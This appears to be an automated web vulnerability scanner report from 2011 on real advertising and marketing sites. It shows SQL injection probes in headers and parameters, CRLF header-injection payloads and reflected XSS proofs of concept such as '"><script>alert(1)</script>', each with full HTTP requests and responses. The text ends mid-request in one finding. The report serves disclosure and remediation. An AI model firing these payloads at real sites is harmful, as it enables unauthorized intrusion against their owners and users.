XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05152011-04

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://www.insidefacebook.com/adtracker2/ads.php [Referer HTTP header] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.insidefacebook.com
Path:	/adtracker2/ads.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adtracker2/ads.php?a=108&c=1&s=1 HTTP/1.1
Host: www.insidefacebook.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=78842188.1305478335.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=78842188.796901433.1305478335.1305478335.1305478335.1; __utmc=78842188; __utmb=78842188.1.10.1305478335

Response 1

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:59:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 23

DB Error: syntax error

Request 2

GET /adtracker2/ads.php?a=108&c=1&s=1 HTTP/1.1
Host: www.insidefacebook.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=78842188.1305478335.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=78842188.796901433.1305478335.1305478335.1305478335.1; __utmc=78842188; __utmb=78842188.1.10.1305478335

Response 2

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:59:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 192

<html><head><meta http-equiv='refresh' content='0;url=http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200' /> </head></html>

1.2. http://www.insidefacebook.com/adtracker2/ads.php [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.insidefacebook.com
Path:	/adtracker2/ads.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adtracker2/ads.php?a=108&c=1&s=1 HTTP/1.1
Host: www.insidefacebook.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=78842188.1305478335.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=78842188.796901433.1305478335.1305478335.1305478335.1; __utmc=78842188; __utmb=78842188.1.10.1305478335

Response 1

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:59:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 23

DB Error: syntax error

Request 2

GET /adtracker2/ads.php?a=108&c=1&s=1 HTTP/1.1
Host: www.insidefacebook.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=78842188.1305478335.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=78842188.796901433.1305478335.1305478335.1305478335.1; __utmc=78842188; __utmb=78842188.1.10.1305478335

Response 2

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:59:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 192

<html><head><meta http-equiv='refresh' content='0;url=http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200' /> </head></html>

1.3. http://www.insidefacebook.com/adtracker2/ads.php [s parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.insidefacebook.com
Path:	/adtracker2/ads.php

Issue detail

The s parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adtracker2/ads.php?a=108&c=1&s=1' HTTP/1.1
Host: www.insidefacebook.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=78842188.1305478335.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=78842188.796901433.1305478335.1305478335.1305478335.1; __utmc=78842188; __utmb=78842188.1.10.1305478335

Response 1

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:55:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 23

DB Error: syntax error

Request 2

GET /adtracker2/ads.php?a=108&c=1&s=1'' HTTP/1.1
Host: www.insidefacebook.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=78842188.1305478335.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=78842188.796901433.1305478335.1305478335.1305478335.1; __utmc=78842188; __utmb=78842188.1.10.1305478335

Response 2

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:55:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 192

<html><head><meta http-equiv='refresh' content='0;url=http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200' /> </head></html>

2. HTTP header injection previous next
There are 2 instances of this issue:

/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA [REST URL parameter 2]
/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA [REST URL parameter 3]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://d.adroll.com/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d2413%0d%0a8ff5604e1dd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/d2413%0d%0a8ff5604e1dd/YNYIFZAM3NACFPVLCC56LA?pv=5913109914.399683&cookie=& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/?source=hspd-InsideFacebook-200x200ad-201104
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Sun, 15 May 2011 16:55:46 GMT
Connection: keep-alive
Set-Cookie: __adroll=a9511c254a13bc2306eae64fb7d8a908; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/d2413
8ff5604e1dd/YNYIFZAM3NACFPVLCC56LA/YBTCZKMLVJGNJKSIKUO3HL.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

2.2. http://d.adroll.com/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 3f628%0d%0a978ff2227b8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/SNWCKNCH3JFBBA3BHHHZOL/3f628%0d%0a978ff2227b8?pv=5913109914.399683&cookie=& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/?source=hspd-InsideFacebook-200x200ad-201104
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Sun, 15 May 2011 16:56:22 GMT
Connection: keep-alive
Set-Cookie: __adroll=485576eb1a4108acfc8ae7d6a39c9836; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/SNWCKNCH3JFBBA3BHHHZOL/3f628
978ff2227b8/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

3. Cross-site scripting (reflected) previous next
There are 25 instances of this issue:

http://gold.insidenetwork.com/facebook/ [name of an arbitrarily supplied request parameter]
http://gold.insidenetwork.com/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js [REST URL parameter 2]
http://gold.insidenetwork.com/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js [REST URL parameter 3]
http://gold.insidenetwork.com/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js [REST URL parameter 4]
http://gold.insidenetwork.com/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js [REST URL parameter 5]
http://gold.insidenetwork.com/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js [REST URL parameter 6]
http://gold.insidenetwork.com/facebook/wp-content/themes/emire/images/favicon.ico [REST URL parameter 2]
http://gold.insidenetwork.com/facebook/wp-content/themes/emire/images/favicon.ico [REST URL parameter 3]
http://gold.insidenetwork.com/facebook/wp-content/themes/emire/images/favicon.ico [REST URL parameter 4]
http://gold.insidenetwork.com/facebook/wp-content/themes/emire/images/favicon.ico [REST URL parameter 5]
http://gold.insidenetwork.com/facebook/wp-content/themes/emire/images/favicon.ico [REST URL parameter 6]
http://www.criteo.com/templates/criteo/js/script.php [name of an arbitrarily supplied request parameter]
http://www.criteo.com/templates/criteo/js/script.php [templateImagePath parameter]
http://www.hubspot.com/free-trial/Default.aspx [LeadGen_ContactForm_10273_m66219:Biggest_Marketing_Challenge__c parameter]
http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [campaign parameter]
http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [campaign_status parameter]
http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [ls parameter]
http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [name of an arbitrarily supplied request parameter]
http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [sd parameter]
http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [utm_campaign parameter]
http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [utm_content parameter]
http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [utm_medium parameter]
http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [utm_source parameter]
http://www.votigo.com/corp/solutions/fbcontests.php [insidefacebook parameter]
http://www.votigo.com/corp/solutions/fbcontests.php [name of an arbitrarily supplied request parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://gold.insidenetwork.com/facebook/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gold.insidenetwork.com
Path:	/facebook/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1300"><script>alert(1)</script>40c5716cd22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1300\"><script>alert(1)</script>40c5716cd22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook/?b1300"><script>alert(1)</script>40c5716cd22=1 HTTP/1.1
Host: gold.insidenetwork.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:54:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=a1ck6as538vgj203rmap8r26n4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://gold.insidenetwork.com/facebook/xmlrpc.php
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 12085



<!DO
...[SNIP]...
<input type="hidden" name="amember_redirect_url" value="/facebook/?b1300\"><script>alert(1)</script>40c5716cd22=1"/>
...[SNIP]...

3.2. http://gold.insidenetwork.com/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gold.insidenetwork.com
Path:	/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eba3c"><script>alert(1)</script>6031dc06af8 was submitted in the REST URL parameter 2. This input was echoed as eba3c\"><script>alert(1)</script>6031dc06af8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook/wp-contenteba3c"><script>alert(1)</script>6031dc06af8/plugins/vipers-video-quicktags/resources/swfobject.js?ver=2.2 HTTP/1.1
Host: gold.insidenetwork.com
Proxy-Connection: keep-alive
Referer: http://gold.insidenetwork.com/facebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9bij1cq4k9vurorpstbb5qugd0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 16:57:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://gold.insidenetwork.com/facebook/xmlrpc.php
Last-Modified: Sun, 15 May 2011 16:57:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8817



<!DO
...[SNIP]...
<input type="hidden" name="amember_redirect_url" value="/facebook/wp-contenteba3c\"><script>alert(1)</script>6031dc06af8/plugins/vipers-video-quicktags/resources/swfobject.js?ver=2.2"/>
...[SNIP]...

3.3. http://gold.insidenetwork.com/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gold.insidenetwork.com
Path:	/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ca95"><script>alert(1)</script>ed944c82593 was submitted in the REST URL parameter 3. This input was echoed as 5ca95\"><script>alert(1)</script>ed944c82593 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook/wp-content/plugins5ca95"><script>alert(1)</script>ed944c82593/vipers-video-quicktags/resources/swfobject.js?ver=2.2 HTTP/1.1
Host: gold.insidenetwork.com
Proxy-Connection: keep-alive
Referer: http://gold.insidenetwork.com/facebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9bij1cq4k9vurorpstbb5qugd0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 16:58:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://gold.insidenetwork.com/facebook/xmlrpc.php
Last-Modified: Sun, 15 May 2011 16:58:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8817



<!DO
...[SNIP]...
<input type="hidden" name="amember_redirect_url" value="/facebook/wp-content/plugins5ca95\"><script>alert(1)</script>ed944c82593/vipers-video-quicktags/resources/swfobject.js?ver=2.2"/>
...[SNIP]...

3.4. http://gold.insidenetwork.com/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gold.insidenetwork.com
Path:	/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8f84"><script>alert(1)</script>4bf3fd3732e was submitted in the REST URL parameter 4. This input was echoed as f8f84\"><script>alert(1)</script>4bf3fd3732e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook/wp-content/plugins/vipers-video-quicktagsf8f84"><script>alert(1)</script>4bf3fd3732e/resources/swfobject.js?ver=2.2 HTTP/1.1
Host: gold.insidenetwork.com
Proxy-Connection: keep-alive
Referer: http://gold.insidenetwork.com/facebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9bij1cq4k9vurorpstbb5qugd0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 16:59:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://gold.insidenetwork.com/facebook/xmlrpc.php
Last-Modified: Sun, 15 May 2011 16:59:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8817



<!DO
...[SNIP]...
<input type="hidden" name="amember_redirect_url" value="/facebook/wp-content/plugins/vipers-video-quicktagsf8f84\"><script>alert(1)</script>4bf3fd3732e/resources/swfobject.js?ver=2.2"/>
...[SNIP]...

3.5. http://gold.insidenetwork.com/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gold.insidenetwork.com
Path:	/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e3d"><script>alert(1)</script>a91f66dc288 was submitted in the REST URL parameter 5. This input was echoed as d0e3d\"><script>alert(1)</script>a91f66dc288 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook/wp-content/plugins/vipers-video-quicktags/resourcesd0e3d"><script>alert(1)</script>a91f66dc288/swfobject.js?ver=2.2 HTTP/1.1
Host: gold.insidenetwork.com
Proxy-Connection: keep-alive
Referer: http://gold.insidenetwork.com/facebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9bij1cq4k9vurorpstbb5qugd0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 16:59:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://gold.insidenetwork.com/facebook/xmlrpc.php
Last-Modified: Sun, 15 May 2011 16:59:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8817



<!DO
...[SNIP]...
<input type="hidden" name="amember_redirect_url" value="/facebook/wp-content/plugins/vipers-video-quicktags/resourcesd0e3d\"><script>alert(1)</script>a91f66dc288/swfobject.js?ver=2.2"/>
...[SNIP]...

3.6. http://gold.insidenetwork.com/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gold.insidenetwork.com
Path:	/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 457ee"><script>alert(1)</script>9a56b274115 was submitted in the REST URL parameter 6. This input was echoed as 457ee\"><script>alert(1)</script>9a56b274115 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js457ee"><script>alert(1)</script>9a56b274115?ver=2.2 HTTP/1.1
Host: gold.insidenetwork.com
Proxy-Connection: keep-alive
Referer: http://gold.insidenetwork.com/facebook/
